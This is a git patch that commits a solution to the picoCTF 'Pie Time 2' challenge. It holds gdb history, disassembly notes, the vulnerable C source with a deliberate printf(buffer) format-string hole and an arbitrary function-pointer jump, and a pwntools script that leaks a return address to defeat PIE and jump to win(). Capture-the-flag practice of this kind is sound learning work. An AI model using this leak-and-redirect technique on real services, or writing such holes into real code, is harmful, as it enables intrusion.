From a3a7081d42b2061b7dcf7178528920abd8be497f Mon Sep 17 00:00:00 2001
From: THEON-1 <git@theon-1.de>
Date: Thu, 4 Dec 2025 11:53:31 +0100
Subject: [PATCH] Pie Time 2

---
 pie_time_2/.gdb_history | 122 ++++++++++++++++++++++++++++++++++++++++
 pie_time_2/notes.md     |  30 ++++++++++
 pie_time_2/sol.py       |  24 ++++++++
 pie_time_2/vuln         | Bin 0 -> 17384 bytes
 pie_time_2/vuln.c       |  56 ++++++++++++++++++
 5 files changed, 232 insertions(+)
 create mode 100644 pie_time_2/.gdb_history
 create mode 100644 pie_time_2/notes.md
 create mode 100755 pie_time_2/sol.py
 create mode 100755 pie_time_2/vuln
 create mode 100644 pie_time_2/vuln.c

diff --git a/pie_time_2/.gdb_history b/pie_time_2/.gdb_history
new file mode 100644
index 0000000..a113728
--- /dev/null
+++ b/pie_time_2/.gdb_history
@@ -0,0 +1,122 @@
+r
+Quit
+r
+b *0
+r
+step
+step
+stepi
+next
+r
+nexti
+stepi
+break main
+r
+b
+clear 3
+clear
+exit
+break main
+r
+stepi
+stepi
+stepi
+nexti 
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+exit
+b main
+r
+nexti
+stepi
+nexti
+stack-explore
+stackf
+hexdump 
+hexdump $sp
+hexdump $sp 128
+hexdump $sp 512
+ad40a7a0
+b main
+r
+stepi
+nexti
+r
+nexti
+step
+nexti
+stackf
+r
+nexti
+stepi
+nexti
+stackf
+r
+nexti
+stepi
+nexti
+stackf
+exit
+b call_functions 
+r
+nexti
+stackf
+r
+nexti
+nexti
+stackf
+r
+nexti
+stackf
+r
+nexti
+nexti
+stackf
+r
+nexti
+stackf
+r
+nexti
+nexti
+stackf
+r
+nexti
+exit
+b call_functions+80
+b *call_functions+80
+r
+nexti
+stackf
+r
+nexti
+stackf
+55559311.f7e0a7a0.f7e0a7a0.55559328.0.340.f7e095c0.252e7825
+r
+exit
+b *call_functions+85
+r
+stackf
+55559311f7e0a7a0f7e0a7a0555593310340f7e095c078257825782578257825782578257825a980000
+r
+stackf
+55559311f7e0a7a0f7e0a7a0555593410340f7e095c0782578257825782578257825782578257825782578257825a0051675000ffffcff055555441ffffd090f7c27635f7fc2000ffffd118ffffd050
+r
+stackf
+r
+stackf
+r
+stackf
+exit
diff --git a/pie_time_2/notes.md b/pie_time_2/notes.md
new file mode 100644
index 0000000..269cbf6
--- /dev/null
+++ b/pie_time_2/notes.md
@@ -0,0 +1,30 @@
+# find main layout with `objdump -d --disassemble=main vuln`
+```assembly
+0000000000001400 <main>:
+    1400:	f3 0f 1e fa          	endbr64
+    1404:	55                   	push   %rbp
+    1405:	48 89 e5             	mov    %rsp,%rbp
+    1408:	48 8d 35 9a fe ff ff 	lea    -0x166(%rip),%rsi        # 12a9 <segfault_handler>
+    140f:	bf 0b 00 00 00       	mov    $0xb,%edi
+    1414:	e8 57 fd ff ff       	call   1170 <signal@plt>
+    1419:	48 8b 05 f0 2b 00 00 	mov    0x2bf0(%rip),%rax        # 4010 <stdout@GLIBC_2.2.5>
+    1420:	b9 00 00 00 00       	mov    $0x0,%ecx
+    1425:	ba 02 00 00 00       	mov    $0x2,%edx
+    142a:	be 00 00 00 00       	mov    $0x0,%esi
+    142f:	48 89 c7             	mov    %rax,%rdi
+    1432:	e8 49 fd ff ff       	call   1180 <setvbuf@plt>
+    1437:	b8 00 00 00 00       	mov    $0x0,%eax
+    143c:	e8 86 fe ff ff       	call   12c7 <call_functions>
+    1441:	b8 00 00 00 00       	mov    $0x0,%eax
+    1446:	5d                   	pop    %rbp
+    1447:	c3                   	ret
+```
+# find `main` and `win` locations
+```
+000000000000136a g     F .text	0000000000000096              win
+0000000000001400 g     F .text	0000000000000048              main
+```
+# find buffer offset to read return address into `main` via gdb
+- %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx
+- return value $\leftrightarrow$ *main+65 after dot
+
diff --git a/pie_time_2/sol.py b/pie_time_2/sol.py
new file mode 100755
index 0000000..ac14eaf
--- /dev/null
+++ b/pie_time_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+from pwn import *
+
+#conn = process("./vuln")
+conn = remote('rescued-float.picoctf.net', 49587)
+conn.recvuntil(b'name:')
+conn.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx')
+conn.recvuntil(b'.')
+return_addr = int(conn.recvline(), 16)
+log.info(f"received return addr: {return_addr}")
+conn.recvuntil(b'12345: ')
+
+main_offset = 0x1400
+win_offset = 0x136a
+call_fun_ret_offset = 65
+
+main_addr = return_addr - call_fun_ret_offset
+win_offset = main_addr - main_offset + win_offset
+
+conn.sendline(f'{hex(win_offset)}'.encode())
+conn.recvline()
+conn.interactive()
+
diff --git a/pie_time_2/vuln b/pie_time_2/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..058a207f75f2989c1b864fc8fdb9902d2e4f4e92
GIT binary patch
literal 17384
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
Luvp}9aER>Rl=_X%

literal 0
HcmV?d00001

diff --git a/pie_time_2/vuln.c b/pie_time_2/vuln.c
new file mode 100644
index 0000000..51b81dd
--- /dev/null
+++ b/pie_time_2/vuln.c
@@ -0,0 +1,56 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <unistd.h>
+
+void segfault_handler() {
+  printf("Segfault Occurred, incorrect address.\n");
+  exit(0);
+}
+
+void call_functions() {
+  char buffer[64];
+  printf("Enter your name:");
+  fgets(buffer, 64, stdin);
+  printf(buffer);
+
+  unsigned long val;
+  printf(" enter the address to jump to, ex => 0x12345: ");
+  scanf("%lx", &val);
+
+  void (*foo)(void) = (void (*)())val;
+  foo();
+}
+
+int win() {
+  FILE *fptr;
+  char c;
+
+  printf("You won!\n");
+  // Open file
+  fptr = fopen("flag.txt", "r");
+  if (fptr == NULL)
+  {
+      printf("Cannot open file.\n");
+      exit(0);
+  }
+
+  // Read contents from file
+  c = fgetc(fptr);
+  while (c != EOF)
+  {
+      printf ("%c", c);
+      c = fgetc(fptr);
+  }
+
+  printf("\n");
+  fclose(fptr);
+}
+
+int main() {
+  signal(SIGSEGV, segfault_handler);
+  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
+
+  call_functions();
+  return 0;
+}
\ No newline at end of file